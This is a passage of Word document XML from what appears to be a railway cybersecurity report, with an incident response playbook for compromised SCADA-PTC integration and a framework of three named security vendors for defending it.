        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-15 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate affected SCADA nodes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from PTC gateways </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[84]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000300">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable PTC local control mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypassing SCADA </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[85]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000301">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy incident response team</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ICS expertise </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[86]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000302">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Halt all train movements</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in affected territories </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[87]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000303">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gsx4fulemhi2" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment (15-60 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate backup dispatch centers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with isolated systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[88]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset all SCADA-PTC integration credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[89]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000306">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable manual safety verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref90">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[90]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement emergency network segmentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref91">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[91]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000308">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g6pqbx9yu60x" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery (1-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of SCADA and PTC logs </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref92">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[92]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate all PTC safety configurations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref93">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[93]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phased service restoration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with enhanced monitoring </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[94]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regulatory notification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> per TSA requirements </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref95">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[95]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b2aimtgym114" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000310">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6o2xr6r8ukn2" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Defense Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000311">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The combination of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard AESOP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> addresses PTC-SCADA integration vulnerabilities </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[96]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000312">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dynsmcbo4471" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture Review</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: End-to-end SCADA-PTC data flow analysis </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref97">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[97]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000314">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Controlled exploitation of integration points </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref98">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[98]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Zero-trust architecture for safety systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref99">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[99]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000316">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qiwucgbppr5d" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA-to-PTC command validation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref100">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[100]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: CARBIDE group TTP identification </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[101]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000319">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset Context</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: PTC device inventory and vulnerability mapping </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref102">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[102]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
